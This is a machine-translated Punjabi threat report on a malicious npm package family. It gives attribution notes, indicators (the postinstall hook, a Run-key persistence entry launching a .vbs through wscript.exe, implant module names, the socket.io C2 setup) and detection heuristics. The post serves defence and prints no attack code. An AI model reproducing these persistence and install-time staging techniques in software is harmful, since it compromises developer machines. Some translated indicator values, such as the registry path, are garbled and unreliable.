ਕੋਡ ਸ਼ੈਲੀ ਬੇਮਿਸਾਲ ਹੈ Node.js: standard ਲਾਇਬ੍ਰੇਰੀ ਕਾਲਾਂ ਜਿਵੇਂ ਕਿ os, child_process, spawnਹੈ, ਅਤੇ reg add. ਕੋਈ ਗੁੰਝਲਦਾਰ ਨਹੀਂ ਹੈ, ਕੋਈ ਸਟਰਿੰਗ ਰੋਟੇਸ਼ਨ ਨਹੀਂ ਹੈ, ਅਤੇ ਕੋਈ ਐਂਟੀ-ਡੀਬੱਗ ਤਰਕ ਨਹੀਂ ਹੈ। ਲੇਖਕ ਵਿੰਡੋਜ਼ ਰਜਿਸਟਰੀ ਪ੍ਰਾਈਮਿਟਿਵਜ਼ ਅਤੇ ਡਿਟੈਚਡ-ਚਾਈਲਡ-ਪ੍ਰੋਸੈਸ ਆਰਕੈਸਟ੍ਰੇਸ਼ਨ ਨਾਲ ਸਹਿਜ ਹੈ, ਪਰ ਉਹ ਸਟੀਲਥੀਅਰ ਟ੍ਰੇਡਕ੍ਰਾਫਟ ਤੱਕ ਪਹੁੰਚਦਾ ਨਹੀਂ ਜਾਪਦਾ ਜੋ ਉਹ ਸੰਭਾਵੀ ਤੌਰ 'ਤੇ ਵਰਤ ਰਹੇ ਹੋਣ।
ਨਿਰਭਰਤਾਵਾਂ ਪੂਰੀ ਤਰ੍ਹਾਂ ਸ਼ੈਲਫ ਤੋਂ ਬਾਹਰ ਹਨ ਅਤੇ ਚੰਗੀ ਤਰ੍ਹਾਂ ਜਾਣੀਆਂ ਜਾਂਦੀਆਂ ਹਨ: screenshot-desktop, nut-js, better-sqlite3ਹੈ, ਅਤੇ socket.io-client. ਕੋਈ ਕਸਟਮ ਪ੍ਰੋਟੋਕੋਲ ਨਹੀਂ ਹੈ, ਕੋਈ ਰੋਲਡ-ਫ੍ਰਾਮ-ਸਕ੍ਰੈਚ C2 ਸਟੈਕ ਨਹੀਂ ਹੈ, ਅਤੇ ਪਾਠ-ਪੁਸਤਕ ਤੋਂ ਪਰੇ ਕੋਈ ਨਵੀਂ ਸਥਿਰਤਾ ਚਾਲ ਨਹੀਂ ਹੈ। HKCU ਰਨ ਕੁੰਜੀ. ਇਹ ਇੱਕ ਸਮਰੱਥ ਇੰਟੀਗਰੇਟਰ ਹੈ, ਇੱਕ ਟੂਲ ਲੇਖਕ ਨਹੀਂ।
ਸਾਨੂੰ ਪ੍ਰਕਾਸ਼ਿਤ ਕਲਾਕ੍ਰਿਤੀਆਂ ਦੇ ਅੰਦਰ ਗੈਰ-ਅੰਗਰੇਜ਼ੀ ਸਟ੍ਰਿੰਗ, ਏਮਬੈਡਡ ਟਿੱਪਣੀਆਂ, ਲੋਕੇਲ ਡੇਟਾ, ਜਾਂ ਕੰਪਾਈਲਰ-ਆਉਟਪੁੱਟ ਟਾਈਮਜ਼ੋਨ ਫਿੰਗਰਪ੍ਰਿੰਟ ਨਹੀਂ ਮਿਲੇ।
ਅਸੀਂ ਪਹਿਲਾਂ ਤੋਂ ਹੀ ਟਰੈਕ ਕੀਤੇ ਗਏ ਮੁਹਿੰਮਾਂ ਦੇ ਨਾਲ ਕੋਡ ਓਵਰਲੈਪ ਦੀ ਜਾਂਚ ਕੀਤੀ, ਜਿਸ ਵਿੱਚ ਸ਼ਾਮਲ ਹਨ ਸ਼ਾਈ ਹੁਲੁਦ, ਆਊਲੀਵੀਅਨ, ਬਿਲਡਕਾਈਟ, ਅਤੇ ਹਾਲ ਹੀ ਵਿੱਚ ਹੀਬਾਈ / claude-code-best ਐਂਥ੍ਰੋਪਿਕ-CLI ਕਲੋਨ ਪਰਿਵਾਰ। ਸਾਨੂੰ ਕੋਈ ਨਹੀਂ ਮਿਲਿਆ: ਕੋਈ ਸਾਂਝਾ C2 ਪੈਟਰਨ ਨਹੀਂ, ਕੋਈ ਸਾਂਝਾ ਫਾਈਲ ਲੇਆਉਟ ਨਹੀਂ, ਅਤੇ ਕੋਈ ਸਾਂਝਾ ਮੁਹਾਵਰਾ ਨਹੀਂ।
ਅਸੀਂ ਇਹ ਨਹੀਂ ਕਹਾਂਗੇ: ਕਿ ਇਹ ਇੱਕ ਰਾਜ ਅਦਾਕਾਰ ਹੈ, ਇੱਕ ਜਾਣਿਆ-ਪਛਾਣਿਆ ਸਮੂਹ ਹੈ, ਜਾਂ ਭੂਗੋਲਿਕ ਤੌਰ 'ਤੇ ਕਿਸੇ ਖਾਸ ਦੇਸ਼ ਨਾਲ ਜੁੜਿਆ ਹੋਇਆ ਹੈ।
ਸੰਚਾਲਨ ਪ੍ਰੋਫਾਈਲ ਡਿਵੈਲਪਰ-ਵਰਕਸਟੇਸ਼ਨ ਨਿਗਰਾਨੀ ਕਰਨ ਵਾਲੀ ਇੱਕ ਛੋਟੀ, ਦਰਮਿਆਨੀ ਹੁਨਰਮੰਦ ਟੀਮ ਦੇ ਅਨੁਕੂਲ ਹੈ। ਇਹ ਸੰਭਾਵਤ ਤੌਰ 'ਤੇ ਪਹੁੰਚ ਦੀ ਡਾਊਨਸਟ੍ਰੀਮ ਵਰਤੋਂ ਦੁਆਰਾ ਵਿੱਤੀ ਤੌਰ 'ਤੇ ਪ੍ਰੇਰਿਤ ਹੈ, ਪਰ ਸੰਭਾਵਤ ਤੌਰ 'ਤੇ ਇੱਕ ਵੱਖਰੇ ਖਰੀਦਦਾਰ ਲਈ ਸੇਵਾ ਵਜੋਂ ਖੋਜ ਵੀ ਹੈ।
ਦੋ ਅਸਿੱਧੇ ਨੁਕਤੇ ਸਮਰਥਨ ਕਰਦੇ ਹਨ ਜੋ ਪੜ੍ਹਦੇ ਹਨ: ਧਿਆਨ ਖਿੱਚਣ ਵਾਲੇ ਐਕਸਫਿਲਟਰੇਸ਼ਨ ਮਕੈਨਿਕਸ ਤੋਂ ਬਚਣਾ ਜੋ ਕਲੱਸਟਰ ਨੂੰ ਤੇਜ਼ੀ ਨਾਲ ਸਾੜ ਦੇਣਗੇ, ਜਿਵੇਂ ਕਿ ਟੈਲੀਗ੍ਰਾਮ ਬੋਟ, oastify.com, ਜਾਂ ਕੈਨਰੀਟੋਕਨ, ਅਤੇ ਜਾਣਬੁੱਝ ਕੇ ਨਰਮ ਪੈਕੇਜ ਨਾਮ, ਜੋ ਕਿ ਇੱਕ ਛੋਟੇ ਉੱਚ-ਵਾਲੀਅਮ ਸਪਾਈਕ ਉੱਤੇ ਸ਼ਾਂਤ ਲੰਬੀ-ਪੂਛ ਸਥਾਪਨਾਵਾਂ ਦਾ ਸਮਰਥਨ ਕਰਦੇ ਹਨ।
ਸਮਝੌਤਾ ਅਤੇ ਖੋਜ ਦੇ ਸੰਕੇਤ
| ਪੈਕੇਜ ਅਤੇ ਪ੍ਰਕਾਸ਼ਕ | |
|---|---|
| ਫੀਲਡ | ਮੁੱਲ |
| npm ਪ੍ਰਕਾਸ਼ਕ | user0001 |
| ਪ੍ਰਕਾਸ਼ਕ ਈਮੇਲ | tanvisoul9@gmail.com, ਅਪ੍ਰਮਾਣਿਤ |
| ਪੈਕੇਜ | ਸੈਂਟਰੋਗਰ, ਡੋਮ-ਯੂਟਿਲਸ-ਲਾਈਟ, ਨੋਡ-ਫੈਚ-ਲਾਈਟ, ਕਨੈਕਟਰ-ਏਜੰਟ, ਨੋਡ-ਜਿਪ-ਰਨਟਾਈਮ, ਨੋਡ-ਐਨਵੀ-ਰੈਜ਼ੋਲਵ |
| ਨੁਕਸਾਨਦੇਹ ਹੋਣ ਦੀ ਪੁਸ਼ਟੀ ਕੀਤੀ ਗਈ | ਨੋਡ-ਐਨਵੀ-ਰਿਜ਼ੋਲਵ@1.0.7, ਨੋਡ-ਐਨਵੀ-ਰਿਜ਼ੋਲਵ@1.0.8 |
| ਮੇਜ਼ਬਾਨ ਕਲਾਕ੍ਰਿਤੀਆਂ | |
|---|---|
| ਦੀ ਕਿਸਮ | ਮੁੱਲ |
| ਦ੍ਰਿੜਤਾ ਕੁੰਜੀ | HKCU\ਸਾਫਟਵੇਅਰ\ਮਾਈਕ੍ਰੋਸਾਫਟ\ਵਿੰਡੋਜ਼\ਕਰੰਟਵਰਜ਼ਨ\ਰਨ |
| ਦ੍ਰਿੜਤਾ ਮੁੱਲ | ਵੇਰੀਏਬਲ ਨਾਮ; wscript.exe ਫਾਰਮ ਦਾ ਡੇਟਾ " \\ .vbs" |
| ਹੁੱਕ ਲਗਾਓ | ਪੋਸਟਇੰਸਟਾਲ: ਪੈਕੇਜ ਮੈਨੀਫੈਸਟ ਵਿੱਚ ਨੋਡ postinstall.js |
| ਇਮਪਲਾਂਟ ਮੋਡੀਊਲ | src/audioCapture.js, src/browserHistory.js, src/systemInfo.js |
| ਸਟੇਜਿੰਗ ਡਾਇਰੈਕਟਰੀ | INSTALL_DIR ਪ੍ਰੋਜੈਕਟ ਦੇ node_modules ਤੋਂ ਬਾਹਰ ਹੱਲ ਕੀਤਾ ਗਿਆ; ਇੰਸਟਾਲ ਸਮੇਂ postinstall.js ਦੁਆਰਾ ਸਥਾਨ ਸੈੱਟ ਕੀਤਾ ਗਿਆ |
| ਨੈੱਟਵਰਕ | |
|---|---|
| ਦੀ ਕਿਸਮ | ਮੁੱਲ |
| C2 ਟ੍ਰਾਂਸਪੋਰਟ | socket.io-client, ਸਥਾਈ ਦੋ-ਦਿਸ਼ਾਵੀ ਚੈਨਲ |
| C2 ਅੰਤਮ ਬਿੰਦੂ | ਏਜੰਟ ਨੂੰ SERVER_URL ਵਾਤਾਵਰਣ ਵੇਰੀਏਬਲ ਰਾਹੀਂ ਪ੍ਰਦਾਨ ਕੀਤਾ ਗਿਆ; ਪ੍ਰਕਾਸ਼ਿਤ ਕਲਾਕ੍ਰਿਤੀਆਂ ਵਿੱਚ ਹਾਰਡ-ਕੋਡ ਨਹੀਂ ਕੀਤਾ ਗਿਆ |
ਖੋਜ ਨੋਟਸ
ਦੋ ਨਿਯਮ ਇਸ ਪਰਿਵਾਰ ਨੂੰ C2 ਅੰਤਮ ਬਿੰਦੂ ਦੀ ਲੋੜ ਤੋਂ ਬਿਨਾਂ ਫੜਦੇ ਹਨ।
ਪਹਿਲਾਂ, ਪੋਸਟਇੰਸਟਾਲ ਸਕ੍ਰਿਪਟਾਂ ਨੂੰ ਫਲੈਗ ਕਰੋ ਜੋ ਅੰਦਰੂਨੀ ਪ੍ਰਦਰਸ਼ਨ ਕਰਦੀਆਂ ਹਨ npm install ਪੈਕੇਜ ਦੀ ਆਪਣੀ ਡਾਇਰੈਕਟਰੀ ਤੋਂ ਬਾਹਰ ਇੱਕ ਮਾਰਗ ਵਿੱਚ। ਕੋਈ ਵੀ ਜਾਇਜ਼ ਪ੍ਰੀਬਿਲਡ ਡਾਊਨਲੋਡਰ, ਜਿਵੇਂ ਕਿ node-gyp ਦੁਬਾਰਾ ਬਣਾਉਂਦਾ ਹੈ ਜਾਂ ਪਹਿਲਾਂ ਤੋਂ ਬਣੇ-ਬਾਈਨਰੀ ਡਾਊਨਲੋਡਰ, ਪੈਕੇਜ ਦੇ ਅੰਦਰ ਜਾਂ ਪਲੇਟਫਾਰਮ ਵਿੱਚ ਲਿਖਦਾ ਹੈ-standard ਪ੍ਰਮਾਣਿਤ ਹੈਸ਼ਾਂ ਵਾਲੇ ਕੈਸ਼ ਪਾਥ। ਇਹ ਤਾਜ਼ੇ ਬਣਾਏ ਗਏ ਵਿੱਚ ਨਹੀਂ ਲਿਖਦਾ ਹੈ INSTALL_DIR ਡਿਸਕ 'ਤੇ ਕਿਤੇ ਹੋਰ।
ਦੂਜਾ, ਜਾਰੀ ਹੋਣ ਵਾਲੀਆਂ ਪੋਸਟਇੰਸਟਾਲ ਸਕ੍ਰਿਪਟਾਂ ਨੂੰ ਫਲੈਗ ਕਰੋ reg add HKCU\…\Run ਨਾਲ wscript.exe ਲਾਂਚਰ ਦੇ ਤੌਰ 'ਤੇ। ਇਹ ਅਸਲ ਵਿੱਚ ਕਦੇ ਵੀ npm ਪੈਕੇਜ ਤੋਂ ਜਾਇਜ਼ ਨਹੀਂ ਹੁੰਦਾ। ਇਸਨੂੰ ਫਲੈਗ ਕਰੋ ਅਤੇ ਕੁਆਰੰਟੀਨ ਕਰੋ।
ਇੱਕ ਤੀਜਾ ਹਿਉਰਿਸਟਿਕ ਅਗਲੇ ਭੈਣ-ਭਰਾ ਪੈਕੇਜ ਦੀ ਪੁਸ਼ਟੀ ਹੋਣ ਤੋਂ ਪਹਿਲਾਂ ਉਸਨੂੰ ਲੱਭਣ ਲਈ ਲਾਭਦਾਇਕ ਹੈ: ਇੱਕ ਤਾਜ਼ਾ npm ਪ੍ਰਕਾਸ਼ਕ ਜਿਸ ਕੋਲ ਕੋਈ ਨਹੀਂ ਹੈ SCM ਤਸਦੀਕ, ਇੱਕ ਜੀਮੇਲ ਈਮੇਲ, ਨਹੀਂ repository ਫੀਲਡ, ਅਤੇ ਇੱਕ ਦੂਜੇ ਦੇ ਦਿਨਾਂ ਦੇ ਅੰਦਰ ਪ੍ਰਕਾਸ਼ਿਤ ਕਈ ਛੋਟੇ, ਆਮ, ਬੁਨਿਆਦੀ ਢਾਂਚੇ-ਆਵਾਜ਼ ਵਾਲੇ ਪੈਕੇਜ ਨਾਮ, ਆਪਣੇ ਆਪ ਵਿੱਚ, ਦਸਤੀ ਸਮੀਖਿਆ ਦੀ ਵਾਰੰਟੀ ਦੇਣ ਲਈ ਕਾਫ਼ੀ ਹਨ।
npm ਰਜਿਸਟਰੀ ਨੂੰ ਰਿਪੋਰਟ ਕੀਤਾ ਗਿਆ। ਪ੍ਰਕਾਸ਼ਕ ਖਾਤਾ ਹਟਾਏ ਜਾਣ 'ਤੇ ਅਸੀਂ ਇਸ ਪੋਸਟ ਨੂੰ ਅਪਡੇਟ ਕਰਾਂਗੇ।






